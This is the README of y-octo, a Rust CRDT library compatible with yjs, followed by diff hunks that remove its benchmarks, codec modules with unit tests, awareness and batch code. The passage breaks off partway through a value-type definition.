<a href="https://affine.pro"><img src="./assets/affine.svg" /></a>
[AFFiNE](https://affine.pro) is using y-octo in production. There are [Electron](https://affine.pro/download) app and [Node.js server](https://github.com/toeverything/AFFiNE/tree/canary/packages/backend/native) using y-octo in production.
<a href="https://www.mysc.app/"><img src="https://www.mysc.app/images/logo_blk.webp" width="120px" /></a>
[Mysc](https://www.mysc.app/) is using y-octo in the Rust server, and the iOS/Android client via the Swift/Kotlin bindings (Official bindings coming soon).
## Features
- ✅ Collaborative Text
- ✅ Read and write styled Unicode compatible data.
- 🚧 Add, modify and delete text styles.
- 🚧 Embedded JS data types and collaborative types.
- ✅ Collaborative types of thread-safe.
- Collaborative Array
- ✅ Add, modify, and delete basic JS data types.
- ✅ Recursively add, modify, and delete collaborative types.
- ✅ Collaborative types of thread-safe.
- 🚧 Recursive event subscription
- Collaborative Map
- ✅ Add, modify, and delete basic JS data types.
- ✅ Recursively add, modify, and delete collaborative types.
- ✅ Collaborative types of thread-safe.
- 🚧 Recursive event subscription
- 🚧 Collaborative Xml (Fragment / Element)
- ✅ Collaborative Doc Container
- ✅ YATA CRDT state apply/diff compatible with [yjs]
- ✅ State sync of thread-safe.
- ✅ Store all collaborative types and JS data types
- ✅ Update event subscription.
- 🚧 Sub Document.
- ✅ Yjs binary encoding
- ✅ Awareness encoding.
- ✅ Primitive type encoding.
- ✅ Sync Protocol encoding.
- ✅ Yjs update v1 encoding.
- 🚧 Yjs update v2 encoding.
## Testing & Linting
Put everything to the test! We've established various test suites, but we're continually striving to enhance our coverage
- Rust Tests
- Unit tests
- [Loom](https://docs.rs/loom/latest/loom/) multi-threading tests
- [Miri](https://github.com/rust-lang/miri) undefined behavior tests
- [Address Sanitizer](https://doc.rust-lang.org/beta/unstable-book/compiler-flags/sanitizer.html) memory error detections
- [Fuzzing](https://github.com/rust-fuzz/cargo-fuzz) fuzzing tests
- Node Tests
- Smoke Tests
- Eslint, Clippy
## Related projects
- [OctoBase]: The open-source embedded database based on Y-Octo.
- [yjs]: Shared data types for building collaborative software in web.
## Maintainers
- [DarkSky](https://github.com/darkskygit)
- [liuyi](https://github.com/forehalo)
- [LongYinan](https://github.com/Brooooooklyn)
## Why not [yrs](https://github.com/y-crdt/y-crdt/)
See [Why we're not using yrs](./y-octo-utils/yrs-is-unsafe/README.md)
## License
Y-Octo are [MIT licensed].
[codecov]: https://codecov.io/gh/toeverything/y-octo/graph/badge.svg?token=9AQY5Q1BYH
[crates]: https://img.shields.io/crates/v/y-octo.svg
[docs]: https://img.shields.io/docsrs/y-octo.svg
[test]: https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml/badge.svg
[yjs]: https://github.com/yjs/yjs
[Address Sanitizer]: https://github.com/toeverything/y-octo/actions/workflows/y-octo-asan.yml/badge.svg
[Memory Leak Detect]: https://github.com/toeverything/y-octo/actions/workflows/y-octo-memory-test.yml/badge.svg
[OctoBase]: https://github.com/toeverything/octobase
[BlockSuite]: https://github.com/toeverything/blocksuite
[AFFiNE]: https://github.com/toeverything/affine
[MIT licensed]: ./LICENSE
@@ -1,34 +0,0 @@
mod utils;
use std::time::Duration;
use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main};
use path_ext::PathExt;
use utils::Files;
fn apply(c: &mut Criterion) {
let files = Files::load();
let mut group = c.benchmark_group("apply");
group.measurement_time(Duration::from_secs(15));
for file in &files.files {
group.throughput(Throughput::Bytes(file.content.len() as u64));
group.bench_with_input(
BenchmarkId::new("apply with jwst", file.path.name_str()),
&file.content,
|b, content| {
b.iter(|| {
use y_octo::*;
let mut doc = Doc::new();
doc.apply_update_from_binary_v1(content.clone()).unwrap()
});
},
);
}
group.finish();
}
criterion_group!(benches, apply);
criterion_main!(benches);
@@ -1,71 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
use rand::{Rng, SeedableRng};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/array");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in &idxs {
array.insert(*idx, "test").unwrap();
}
});
});
group.bench_function("jwst/insert range", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in &idxs {
array.insert(*idx, "test1").unwrap();
array.insert(idx + 1, "test2").unwrap();
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut array = doc.get_or_create_array("test").unwrap();
for c in base_text.chars() {
array.push(c.to_string()).unwrap();
}
for idx in (0..base_text.len() as u64).rev() {
array.remove(idx, 1).unwrap();
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,91 +0,0 @@
use criterion::{Criterion, SamplingMode, criterion_group, criterion_main};
use y_octo::{read_var_i32, read_var_u64, write_var_i32, write_var_u64};
const BENCHMARK_SIZE: u32 = 100000;
fn codec(c: &mut Criterion) {
let mut codec_group = c.benchmark_group("codec");
codec_group.sampling_mode(SamplingMode::Flat);
{
codec_group.bench_function("jwst encode var_int (32 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as i32) {
write_var_i32(&mut encoder, i).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_int (32 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as i32) {
write_var_i32(&mut encoder, i).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
for i in 0..(BENCHMARK_SIZE as i32) {
let (tail, num) = read_var_i32(decoder).unwrap();
decoder = tail;
assert_eq!(num, i);
}
})
});
}
{
codec_group.bench_function("jwst encode var_uint (32 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..BENCHMARK_SIZE {
write_var_u64(&mut encoder, i as u64).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_uint (32 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..BENCHMARK_SIZE {
write_var_u64(&mut encoder, i as u64).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
for i in 0..BENCHMARK_SIZE {
let (tail, num) = read_var_u64(decoder).unwrap();
decoder = tail;
assert_eq!(num as u32, i);
}
})
});
}
{
codec_group.bench_function("jwst encode var_uint (64 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as u64) {
write_var_u64(&mut encoder, i).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_uint (64 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as u64) {
write_var_u64(&mut encoder, i).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
for i in 0..(BENCHMARK_SIZE as u64) {
let (tail, num) = read_var_u64(decoder).unwrap();
decoder = tail;
assert_eq!(num, i);
}
})
});
}
}
criterion_group!(benches, codec);
criterion_main!(benches);
@@ -1,65 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/map");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
});
});
group.bench_function("jwst/get", |b| {
use y_octo::*;
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
b.iter(|| {
for key in &base_text {
map.get(key);
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
for key in &base_text {
map.remove(key);
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,50 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
use rand::{Rng, SeedableRng};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/text");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, base_text).unwrap();
for idx in &idxs {
text.insert(*idx, "test").unwrap();
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, base_text).unwrap();
text.insert(0, base_text).unwrap();
text.insert(0, base_text).unwrap();
for idx in (0..base_text.len() as u64).rev() {
text.remove(idx, 1).unwrap();
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,34 +0,0 @@
mod utils;
use std::time::Duration;
use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main};
use path_ext::PathExt;
use utils::Files;
fn update(c: &mut Criterion) {
let files = Files::load();
let mut group = c.benchmark_group("update");
group.measurement_time(Duration::from_secs(15));
for file in &files.files {
group.throughput(Throughput::Bytes(file.content.len() as u64));
group.bench_with_input(
BenchmarkId::new("parse with jwst", file.path.name_str()),
&file.content,
|b, content| {
b.iter(|| {
use y_octo::*;
let mut decoder = RawDecoder::new(content);
Update::read(&mut decoder).unwrap()
});
},
);
}
group.finish();
}
criterion_group!(benches, update);
criterion_main!(benches);
@@ -1,42 +0,0 @@
use std::{
fs::{read, read_dir},
path::{Path, PathBuf},
};
use path_ext::PathExt;
pub struct File {
pub path: PathBuf,
pub content: Vec<u8>,
}
const BASE: &str = "src/fixtures/";
impl File {
fn new(path: &Path) -> Self {
let content = read(path).unwrap();
Self {
path: path.into(),
content,
}
}
}
pub struct Files {
pub files: Vec<File>,
}
impl Files {
pub fn load() -> Self {
let path = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join(BASE);
let files = read_dir(path).unwrap();
let files = files
.flatten()
.filter(|f| f.path().is_file() && f.path().ext_str() == "bin")
.map(|f| File::new(&f.path()))
.collect::<Vec<_>>();
Self { files }
}
}
@@ -1,3 +0,0 @@
mod files;
pub use files::Files;
@@ -1,78 +0,0 @@
use std::io::{Error, Write};
use nom::bytes::complete::take;
use super::*;
pub fn read_var_buffer(input: &[u8]) -> IResult<&[u8], &[u8]> {
let (tail, len) = read_var_u64(input)?;
let (tail, val) = take(len as usize)(tail)?;
Ok((tail, val))
}
pub fn write_var_buffer<W: Write>(buffer: &mut W, data: &[u8]) -> Result<(), Error> {
write_var_u64(buffer, data.len() as u64)?;
buffer.write_all(data)?;
Ok(())
}
#[cfg(test)]
mod tests {
use nom::{
AsBytes, Err,
error::{Error, ErrorKind},
};
use super::*;
#[test]
fn test_read_var_buffer() {
// Test case 1: valid input, buffer length = 5
let input = [0x05, 0x01, 0x02, 0x03, 0x04, 0x05];
let expected_output = [0x01, 0x02, 0x03, 0x04, 0x05];
let result = read_var_buffer(&input);
assert_eq!(result, Ok((&[][..], &expected_output[..])));
// Test case 2: truncated input, missing buffer
let input = [0x05, 0x01, 0x02, 0x03];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 3: invalid input
let input = [0xFF, 0x01, 0x02, 0x03];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[2..], ErrorKind::Eof))));
// Test case 4: invalid var int encoding
let input = [0xFF, 0x80, 0x80, 0x80, 0x80, 0x80, 0x01];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[7..], ErrorKind::Eof))));
}
#[test]
fn test_var_buf_codec() {
test_var_buf_enc_dec(&[]);
test_var_buf_enc_dec(&[0x01, 0x02, 0x03, 0x04, 0x05]);
test_var_buf_enc_dec(b"test_var_buf_enc_dec");
#[cfg(not(miri))]
{
use rand::{Rng, rng};
let mut rng = rng();
for _ in 0..100 {
test_var_buf_enc_dec(&{
let mut bytes = vec![0u8; rng.random_range(0..u16::MAX as usize)];
rng.fill(&mut bytes[..]);
bytes
});
}
}
}
fn test_var_buf_enc_dec(data: &[u8]) {
let mut buf = Vec::<u8>::new();
write_var_buffer(&mut buf, data).unwrap();
let result = read_var_buffer(buf.as_bytes());
assert_eq!(result, Ok((&[][..], data)));
}
}
@@ -1,166 +0,0 @@
use std::io::{Error, Write};
use byteorder::WriteBytesExt;
use nom::Needed;
use super::*;
pub fn read_var_u64(input: &[u8]) -> IResult<&[u8], u64> {
// parse the first byte
if let Some(next_byte) = input.first() {
let mut shift = 7;
let mut curr_byte = *next_byte;
let mut rest = &input[1..];
// same logic in loop, but enable early exit when dealing with small numbers
let mut num = (curr_byte & 0b0111_1111) as u64;
// if the sign bit is set, we need more bits
while (curr_byte >> 7) & 0b1 != 0 {
if let Some(next_byte) = rest.first() {
curr_byte = *next_byte;
// add the remaining 7 bits to the number
num |= ((curr_byte & 0b0111_1111) as u64).wrapping_shl(shift);
shift += 7;
rest = &rest[1..];
} else {
return Err(nom::Err::Incomplete(Needed::new(input.len() + 1)));
}
}
Ok((rest, num))
} else {
Err(nom::Err::Incomplete(Needed::new(1)))
}
}
pub fn write_var_u64<W: Write>(buffer: &mut W, mut num: u64) -> Result<(), Error> {
// bit or 0b1000_0000 pre 7 bit if has more bits
while num >= 0b10000000 {
buffer.write_u8(num as u8 & 0b0111_1111 | 0b10000000)?;
num >>= 7;
}
buffer.write_u8((num & 0b01111111) as u8)?;
Ok(())
}
pub fn read_var_i32(input: &[u8]) -> IResult<&[u8], i32> {
// parse the first byte
if let Some(next_byte) = input.first() {
let mut shift = 6;
let mut curr_byte = *next_byte;
let mut rest: &[u8] = &input[1..];
// get the sign bit and the first 6 bits of the number
let sign_bit = (curr_byte >> 6) & 0b1;
let mut num = (curr_byte & 0b0011_1111) as i64;
// if the sign bit is set, we need more bits
while (curr_byte >> 7) & 0b1 != 0 {
if let Some(next_byte) = rest.first() {
curr_byte = *next_byte;
// add the remaining 7 bits to the number
num |= ((curr_byte & 0b0111_1111) as i64).wrapping_shl(shift);
shift += 7;
rest = &rest[1..];
} else {
return Err(nom::Err::Incomplete(Needed::new(input.len() + 1)));
}
}
// negate the number if the sign bit is set
if sign_bit == 1 {
num = -num;
}
Ok((rest, num as i32))
} else {
Err(nom::Err::Incomplete(Needed::new(1)))
}
}
pub fn write_var_i32<W: Write>(buffer: &mut W, num: i32) -> Result<(), Error> {
let mut num = num as i64;
let is_negative = num < 0;
if is_negative {
num = -num;
}
buffer.write_u8(
// bit or 0b1000_0000 if has more bits
if num > 0b00111111 { 0b10000000 } else { 0 }
// bit or 0b0100_0000 if negative
| if is_negative { 0b0100_0000 } else { 0 }
// store last 6 bits
| num as u8 & 0b0011_1111,
)?;
num >>= 6;
while num > 0 {
buffer.write_u8(
// bit or 0b1000_0000 pre 7 bit if has more bits
if num > 0b01111111 { 0b10000000 } else { 0 }
// store last 7 bits
| num as u8 & 0b0111_1111,
)?;
num >>= 7;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
fn test_var_uint_enc_dec(num: u64) {
let mut buf = Vec::new();
write_var_u64(&mut buf, num).unwrap();
let (rest, decoded_num) = read_var_u64(&buf).unwrap();
assert_eq!(num, decoded_num);
assert_eq!(rest.len(), 0);
}
fn test_var_int_enc_dec(num: i32) {
{
let mut buf = Vec::new();
write_var_i32(&mut buf, num).unwrap();
let (rest, decoded_num) = read_var_i32(&buf).unwrap();
assert_eq!(num, decoded_num);
assert_eq!(rest.len(), 0);
}
}
#[test]
fn test_var_uint_codec() {
test_var_uint_enc_dec(0);
test_var_uint_enc_dec(1);
test_var_uint_enc_dec(127);
test_var_uint_enc_dec(0b1000_0000);
test_var_uint_enc_dec(0b1_0000_0000);
test_var_uint_enc_dec(0b1_1111_1111);
test_var_uint_enc_dec(0b10_0000_0000);
test_var_uint_enc_dec(0b11_1111_1111);
test_var_uint_enc_dec(0x7fff_ffff_ffff_ffff);
test_var_uint_enc_dec(u64::MAX);
}
#[test]
fn test_var_int() {
test_var_int_enc_dec(0);
test_var_int_enc_dec(1);
test_var_int_enc_dec(-1);
test_var_int_enc_dec(63);
test_var_int_enc_dec(-63);
test_var_int_enc_dec(64);
test_var_int_enc_dec(-64);
test_var_int_enc_dec(i32::MAX);
test_var_int_enc_dec(i32::MIN);
test_var_int_enc_dec(((1 << 20) - 1) * 8);
test_var_int_enc_dec(-((1 << 20) - 1) * 8);
}
}
@@ -1,9 +0,0 @@
mod buffer;
mod integer;
mod string;
pub use buffer::{read_var_buffer, write_var_buffer};
pub use integer::{read_var_i32, read_var_u64, write_var_i32, write_var_u64};
pub use string::{read_var_string, write_var_string};
use super::*;
@@ -1,75 +0,0 @@
use std::io::{Error, Write};
use nom::{Parser, combinator::map_res};
use super::*;
pub fn read_var_string(input: &[u8]) -> IResult<&[u8], String> {
map_res(read_var_buffer, |s| String::from_utf8(s.to_vec())).parse(input)
}
pub fn write_var_string<W: Write, S: AsRef<str>>(buffer: &mut W, input: S) -> Result<(), Error> {
let bytes = input.as_ref().as_bytes();
write_var_buffer(buffer, bytes)?;
Ok(())
}
#[cfg(test)]
mod tests {
use nom::{
AsBytes, Err,
error::{Error, ErrorKind},
};
use super::*;
#[test]
fn test_read_var_string() {
// Test case 1: valid input, string length = 5
let input = [0x05, 0x68, 0x65, 0x6C, 0x6C, 0x6F];
let expected_output = "hello".to_string();
let result = read_var_string(&input);
assert_eq!(result, Ok((&[][..], expected_output)));
// Test case 2: missing string length
let input = [0x68, 0x65, 0x6C, 0x6C, 0x6F];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 3: truncated input
let input = [0x05, 0x68, 0x65, 0x6C, 0x6C];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 4: invalid input
let input = [0xFF, 0x01, 0x02, 0x03, 0x04];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[2..], ErrorKind::Eof))));
// Test case 5: invalid var int encoding
let input = [0xFF, 0x80, 0x80, 0x80, 0x80, 0x80, 0x01];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[7..], ErrorKind::Eof))));
// Test case 6: invalid input, invalid UTF-8 encoding
let input = [0x05, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[..], ErrorKind::MapRes))));
}
#[test]
fn test_var_str_codec() {
test_var_str_enc_dec("".to_string());
test_var_str_enc_dec(" ".to_string());
test_var_str_enc_dec("abcde".to_string());
test_var_str_enc_dec("🃒🃓🃟☗🀥🀫∺∼≂≇⓵➎⓷➏‍".to_string());
}
fn test_var_str_enc_dec(input: String) {
let mut buf = Vec::<u8>::new();
write_var_string(&mut buf, input.clone()).unwrap();
let (rest, decoded_str) = read_var_string(buf.as_bytes()).unwrap();
assert_eq!(decoded_str, input);
assert_eq!(rest.len(), 0);
}
}
@@ -1,240 +0,0 @@
use std::{cmp::max, collections::hash_map::Entry};
use super::*;
use crate::sync::Arc;
pub type AwarenessCallback = Arc<dyn Fn(&Awareness, AwarenessEvent) + Send + Sync + 'static>;
pub struct Awareness {
awareness: AwarenessStates,
callback: Option<AwarenessCallback>,
local_id: u64,
}
impl Awareness {
pub fn new(local_id: u64) -> Self {
Self {
awareness: AwarenessStates::new(),
callback: None,
local_id,
}
}
pub fn local_id(&self) -> u64 {
self.local_id
}
pub fn on_update(&mut self, f: impl Fn(&Awareness, AwarenessEvent) + Send + Sync + 'static) {
self.callback = Some(Arc::new(f));
}
pub fn get_states(&self) -> &AwarenessStates {
&self.awareness
}
pub fn get_local_state(&self) -> Option<String> {
self.awareness.get(&self.local_id).map(|state| state.content.clone())
}
fn mut_local_state(&mut self) -> &mut AwarenessState {
self.awareness.entry(self.local_id).or_default()
}
pub fn set_local_state(&mut self, content: String) {
self.mut_local_state().set_content(content);
if let Some(cb) = self.callback.as_ref() {
cb(self, AwarenessEventBuilder::new().update(self.local_id).build());
}
}
pub fn clear_local_state(&mut self) {
self.mut_local_state().delete();
if let Some(cb) = self.callback.as_ref() {
cb(self, AwarenessEventBuilder::new().remove(self.local_id).build());
}
}
pub fn apply_update(&mut self, update: AwarenessStates) {
let mut event = AwarenessEventBuilder::new();
for (client_id, state) in update {
match self.awareness.entry(client_id) {
Entry::Occupied(mut entry) => {
let prev_state = entry.get_mut();
if client_id == self.local_id {
// ignore remote update about local client and
// add clock to overwrite remote data
prev_state.set_clock(max(prev_state.clock, state.clock) + 1);
event.update(client_id);
continue;
}
if prev_state.clock < state.clock {
if state.is_deleted() {
prev_state.delete();
event.remove(client_id);
} else {
*prev_state = state;
event.update(client_id);
}
}
}
Entry::Vacant(entry) => {
entry.insert(state);
event.add(client_id);
}
}
}
if let Some(cb) = self.callback.as_ref() {
cb(self, event.build());
}
}
}
pub struct AwarenessEvent {
added: Vec<u64>,
updated: Vec<u64>,
removed: Vec<u64>,
}
impl AwarenessEvent {
pub fn get_updated(&self, states: &AwarenessStates) -> AwarenessStates {
states
.iter()
.filter(|(id, _)| self.added.contains(id) || self.updated.contains(id) || self.removed.contains(id))
.map(|(id, state)| (*id, state.clone()))
.collect()
}
}
struct AwarenessEventBuilder {
added: Vec<u64>,
updated: Vec<u64>,
removed: Vec<u64>,
}
impl AwarenessEventBuilder {
fn new() -> Self {
Self {
added: Vec::new(),
updated: Vec::new(),
removed: Vec::new(),
}
}
fn add(&mut self, client_id: u64) -> &mut Self {
self.added.push(client_id);
self
}
fn update(&mut self, client_id: u64) -> &mut Self {
self.updated.push(client_id);
self
}
fn remove(&mut self, client_id: u64) -> &mut Self {
self.removed.push(client_id);
self
}
fn build(&mut self) -> AwarenessEvent {
AwarenessEvent {
added: self.added.clone(),
updated: self.updated.clone(),
removed: self.removed.clone(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sync::{Mutex, MutexGuard};
#[test]
fn test_awareness() {
loom_model!({
let mut awareness = Awareness::new(0);
{
// init state
assert_eq!(awareness.local_id, 0);
assert_eq!(awareness.awareness.len(), 0);
}
{
// local state
awareness.set_local_state("test".to_string());
assert_eq!(awareness.get_local_state(), Some("test".to_string()));
awareness.clear_local_state();
assert_eq!(awareness.get_local_state(), Some("null".to_string()));
}
{
// apply remote update
let mut states = AwarenessStates::new();
states.insert(0, AwarenessState::new(2, "test0".to_string()));
states.insert(1, AwarenessState::new(2, "test1".to_string()));
awareness.apply_update(states);
assert!(awareness.get_states().contains_key(&1));
// local state will not apply
assert_eq!(awareness.get_states().get(&0).unwrap().content, "null".to_string());
assert_eq!(awareness.get_states().get(&1).unwrap().content, "test1".to_string());
}
{
// callback
let values: Arc<Mutex<Vec<AwarenessEvent>>> = Arc::new(Mutex::new(Vec::new()));
let callback_values = Arc::clone(&values);
awareness.on_update(move |_, event| {
let mut values = callback_values.lock().unwrap();
values.push(event);
});
let mut new_states = AwarenessStates::new();
// exists in local awareness: update
new_states.insert(1, AwarenessState::new(3, "test update".to_string()));
// not exists in local awareness: add
new_states.insert(2, AwarenessState::new(1, "test update".to_string()));
// not exists in local awareness: add
new_states.insert(3, AwarenessState::new(1, "null".to_string()));
// not exists in local awareness: add
new_states.insert(4, AwarenessState::new(1, "test update".to_string()));
awareness.apply_update(new_states);
let mut new_states = AwarenessStates::new();
// exists in local awareness: delete
new_states.insert(4, AwarenessState::new(2, "null".to_string()));
awareness.apply_update(new_states);
awareness.set_local_state("test".to_string());
awareness.clear_local_state();
let values: MutexGuard<Vec<AwarenessEvent>> = values.lock().unwrap();
assert_eq!(values.len(), 4);
let event = values.first().unwrap();
let mut added = event.added.clone();
added.sort();
assert_eq!(added, [2, 3, 4]);
assert_eq!(event.updated, [1]);
assert_eq!(
event.get_updated(awareness.get_states()).get(&1).unwrap(),
&AwarenessState::new(3, "test update".to_string())
);
let event = values.get(1).unwrap();
assert_eq!(event.removed, [4]);
let event = values.get(2).unwrap();
assert_eq!(event.updated, [0]);
let event = values.get(3).unwrap();
assert_eq!(event.removed, [0]);
}
});
}
}
@@ -1,119 +0,0 @@
use super::*;
#[derive(Debug, PartialEq)]
pub struct Batch {
doc: Doc,
before_state: StateVector,
after_state: StateVector,
changed: HashMap<YTypeRef, Vec<SmolStr>>,
}
impl Batch {
pub fn new(doc: Doc) -> Self {
let current_state = doc.get_state_vector();
Batch {
doc,
before_state: current_state.clone(),
after_state: current_state,
changed: HashMap::new(),
}
}
pub fn with_batch<T, F>(&mut self, f: F) -> T
where
F: FnOnce(Doc) -> T,
{
let ret = f(self.doc.clone());
for (k, v) in self.doc.get_changed() {
self.changed.entry(k).or_default().extend(v.iter().cloned());
}
ret
}
}
pub fn batch_commit<T, F>(mut doc: Doc, f: F) -> Option<T>
where
F: FnOnce(Doc) -> T,
{
// Initialize batch cleanups list
let mut batch_cleanups = vec![];
// Initial call and result initialization
let mut initial_call = false;
{
if doc.batch.is_none() {
initial_call = true;
// Start a new batch
let batch = Batch::new(doc.clone());
doc.batch = Somr::new(batch);
batch_cleanups.push(doc.batch.clone());
}
}
let batch = doc.batch.get_mut()?;
let result = Some(batch.with_batch(f));
if initial_call
&& let Some(current_batch) = doc.batch.get()
&& Some(current_batch) == batch_cleanups[0].get()
{
// Process observer calls and perform cleanup if this is the initial call
cleanup_batches(&mut batch_cleanups);
doc.batch.swap_take();
}
result
}
fn cleanup_batches(batch_cleanups: &mut Vec<Somr<Batch>>) {
for batch in batch_cleanups.drain(..) {
if let Some(batch) = batch.get() {
println!("changed: {:?}", batch.changed);
} else {
panic!("Batch not initialized");
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn should_get_changed_items() {
loom_model!({
let doc = DocOptions::new().with_client_id(1).build();
batch_commit(doc.clone(), |d| {
let mut arr = d.get_or_create_array("arr").unwrap();
let mut text = d.create_text().unwrap();
let mut map = d.create_map().unwrap();
batch_commit(doc.clone(), |_| {
arr.insert(0, Value::from(text.clone())).unwrap();
arr.insert(1, Value::from(map.clone())).unwrap();
});
batch_commit(doc.clone(), |_| {
text.insert(0, "hello world").unwrap();
text.remove(5, 6).unwrap();
});
batch_commit(doc.clone(), |_| {
map.insert("key".into(), 123).unwrap();
});
batch_commit(doc.clone(), |_| {
map.remove("key");
});
batch_commit(doc.clone(), |_| {
arr.remove(0, 1).unwrap();
});
});
});
}
}
@@ -1,691 +0,0 @@
use std::{
fmt::{self, Display},
ops::RangeInclusive,
};
use ordered_float::OrderedFloat;
use super::*;
const MAX_JS_INT: i64 = 0x001F_FFFF_FFFF_FFFF;
// The smallest int in js number.
const MIN_JS_INT: i64 = -MAX_JS_INT;
pub const JS_INT_RANGE: RangeInclusive<i64> = MIN_JS_INT..=MAX_JS_INT;
#[derive(Debug, Clone, PartialEq)]
#[cfg_attr(fuzzing, derive(arbitrary::Arbitrary))]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub enum Any {
Undefined,
Null,
Integer(i32),
Float32(OrderedFloat<f32>),
Float64(OrderedFloat<f64>),
BigInt64(i64),
False,
True,
String(String),
// FIXME: due to macro's overflow evaluating, we can't use proptest here
#[cfg_attr(test, proptest(skip))]
Object(HashMap<String, Any>),
#[cfg_attr(test, proptest(skip))]
Array(Vec<Any>),
Binary(Vec<u8>),
}
impl<R: CrdtReader> CrdtRead<R> for Any {
fn read(reader: &mut R) -> JwstCodecResult<Self> {
let index = reader.read_u8()?;
match 127u8.overflowing_sub(index).0 {
0 => Ok(Any::Undefined),
1 => Ok(Any::Null),
// in yjs implementation, flag 2 only save 32bit integer
2 => Ok(Any::Integer(reader.read_var_i32()?)), // Integer
3 => Ok(Any::Float32(reader.read_f32_be()?.into())), // Float32
4 => Ok(Any::Float64(reader.read_f64_be()?.into())), // Float64
5 => Ok(Any::BigInt64(reader.read_i64_be()?)), // BigInt64
